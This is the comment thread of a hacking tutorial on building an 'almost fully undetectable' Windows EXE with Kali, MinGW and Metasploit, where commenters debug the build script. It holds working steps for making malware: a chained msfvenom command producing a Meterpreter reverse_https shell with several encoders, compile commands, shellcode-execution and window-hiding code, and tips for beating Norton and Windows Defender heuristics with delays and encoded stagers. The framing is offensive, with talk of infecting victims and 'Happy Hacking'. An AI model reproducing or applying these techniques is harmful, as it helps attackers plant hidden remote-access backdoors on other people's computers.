How To: Creating a (Almost) Fully Undetectable EXE Using Kali & GCC

Thanks .... Really Appreciate the post.
AVAST especially now is making my work alot difficult now adays.
Thanks once again.

#Sky

sumx=`sha1sum $filex`

after this line this code is not executing and i'm not getting anything into out folder though i got something in shellcode folder..

The reason for this is probably because gcc.exe did not compile the file properly. Run the commands again, and send me the output from Terminal.

EDIT: I fixed a typo on line 40 where it says "ShellCode" instead of "out" but this shouldn't affect the file in any way functionally.

I also just re ran the file straight from github by copying and pasting and I got my exe.

it says : mv: can not stat `final.exe`: no such file of directory

This means that gcc.exe never compiled that file. Which means that the rest of the script can't run properly because nothing exists in /root/out

so what i need to do.....don't i get solution of this problem??

I'm working on it King, I've spun up a new Kali box to test some things out. Have you followed the instructions on setting up MinGW on kali?

Here is the tutorial as posted in this article.

Attached are proof of concept images. I've used the new kali box (kalitest) and a windows 8.1 machine (User Easymode Machine Gullible) running AVG 2015 Free. I used the new kali box and followed my tutorial (and the MinGW tutorial) exactly and have the results below.

Keep in mind I use Metasploit Pro, but none of its paid components are required. you can still use a cli exploit/multi/handler and achieve a shell.

I hope this assists you, Secret King, and anyone else who has difficulty using this tutorial successfully. Happy Hacking!

i hv install mingw sucessfully where it installed in kali...where can i found

From the How to Set Up MinGW on Kali article I posted:

"Great! Now you can use gcc.exe!

syntax:
cd /root/.wine/drive_c/MinGW/bin
wine gcc.exe -o file.exe sourcefile.c
"
The installation will be located at /root/.wine/drive_c/MinGW
BUT you have to be in ~/bin to run gcc.exe which is why my commands say:

cd /root/.wine/drive_c/MinGW/bin/
wine gcc.exe -o /root/out/final.exe /usr/share/metasploit-framework/ShellCode/final.c -lwsock32

I have a question not about the script but the actual code:

Is it ok to say that this ((void (*)())micro)(); is casting micro to a function pointer, the function which it points to has no arguments and returns void and with the last to brackets that function is called?

And whats the difference between that and this, which i saw somewhere else:
(*(void(*)())code)();

That sounds about right. "micro" is just the variable name. it can be almost anything, but you have to change it where its defined as well.

I know, but why the second expression has 1 more pointer symbol, what difference does that make?

Ok, I got all of the prerequisites setup correctly as far as I can tell, but the script seems to be breaking where some others have mentioned. Any idea what I'm doing wrong based on this? thx

root@osboxes:~/.wine/drivec/MinGW/bin# wine gcc.exe -o /root/out/final.exe /usr/share/metasploit-framework/ShellCode/final.c -lwsock32

/usr/share/metasploit-framework/ShellCode/final.c:405:6: error: expected identifier or '(' before string constant
"""";""""
^
/usr/share/metasploit-framework/ShellCode/final.c:1207:4: error: expected identifier or '(' before string constant
"";""
^
/usr/share/metasploit-framework/ShellCode/final.c: In function 'main':
/usr/share/metasploit-framework/ShellCode/final.c:2013:42: error: 'micro' undeclared (first use in this function)
ShowWindow( hWnd, SWHIDE );((void ()())micro)();}
^

/usr/share/metasploit-framework/ShellCode/final.c:2013:42: note: each undeclared identifier is reported only once for each function it appears in

/usr/share/metasploit-framework/ShellCode/final.c: At top level:
/usr/share/metasploit-framework/ShellCode/final.c:2415:6: error: expected identifier or '(' before string constant
"""";""""
^
/usr/share/metasploit-framework/ShellCode/final.c:3217:4: error: expected identifier or '(' before string constant
"";""
^
root@osboxes:~/.wine/drivec/MinGW/bin# cd /root/out/
root@osboxes:~/out# mv final.exe $RANDOM.exe
mv: cannot stat `final.exe': No such file or directory
root@osboxes:~/out# filex=`ls -ct1 | head -1`
root@osboxes:~/out# sumx=`sha1sum $filex`

I'm not 100% sure why it's breaking right there... I'm going to look into it. I'm actually rewriting it for msfvenom and putting it into .sh proper format. Stay tuned.

EDIT: make sure that right after void it should have an asterisk in the following paretheses.

Sorry for the long comment, I apologize….

I have been messing around with building my own AV evading EXE (I'll share it when I'm done) and I stumbled across yours. I played with it for awhile and thought I'd share my observations and suggestions.

1. The link in your other article seems to no longer contain the missing dll's. Maybe a list of the missing ones could help. Didn't matter for your script though.

2. This is how I got it to work in msfvenom. It's a bit larger than msfpayload/msfencode and I didn't put the effort into why (sorry) since it really didn't matter in an EXE.

change line 6 to:

msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=$port -e x86/shikata_ga_nai -i $enumber -f raw | msfvenom -p - -a x86 --platform win -e x86/jmp_call_additive -i $enumber -f raw | msfvenom -p - -a x86 --platform win -e x86/call4_dword_xor -i $enumber -f raw | msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -i $enumber -f c >test.c

Then you have to change "unsigned char buf =" to "unsigned char micro=" in the final.c file in order for it to compile.

3. I had a bunch of VM's laying around with different AV's on them so I decided to test the various EXE's. None of the AV's picked up on the EXE by simply scanning the hard drive, that's cool. However Norton's did nail it upon execution when I used the meterpreter/reversetcp payload. And I mean it stated meterpreter/reverse_tcp, normally they just say backdoor, trojan etc…. The good thing was it wasn't the payload connecting outbound it was catching. It was the handler sending the second stager. So I encoded the stager with x86/shikata_ga_nai in the advanced options and it worked, sweat… I didn't have any issues with meterpreter/reverse_https like you had stated.

Windows Defender on Windows 10 nailed it every time upon execution. No matter what I used. The heuristics of the AV was catching it. By including #include <unistd.h>in the final.c file and then adding sleep(60*1000); to the main function I was able to wait out the heuristics and the payload executed.

Note: This is a dirty…dirty way to do it but it proved the point of bypassing the heuristics. Also 60 seconds may be a bit of over kill, but hey it worked.

EDITED: to get around Ajax error.

Interesting... I'll have to think about the sleeping in my own payloads.

Yes, I'm just using sleep as an example here. It will work but would probably not be much effort for the AV companies to make a rule that anything that doesn't do anything for x amount of time simply extened the hueristics till it does do something. Idealy you would make it do something trivial and/or harmless for x amount of time. Like some redundant math for 60 seconds.

Hi,
It's the very same for me, I am getting errors. It's a different tho, the script is failing processing line 63.

msfven.sh: 63: msfven.sh: Syntax error: Bad for loop variable

That's what I'm getting, code seems legit tho... Any advice on this ?

Interesting, I just downloaded the sh file and ran it with no issues on Kali. Try downloading the script again and running it? Line 63 is just using a for loop to make a bunch of random fluff at the beginning of the temp file.

Oh, I got it. So stupid, I ran sh gen.sh and not bash gen.sh. Mea culpa, really ^

Hello everyone. I think that creating viruses with Kali Linux is to easy. But these viruses are kind of "phishing" the victim, because he/she has to open it. I love another type of virus. When you click on it, your PC is infected. However, with Kali you can make everything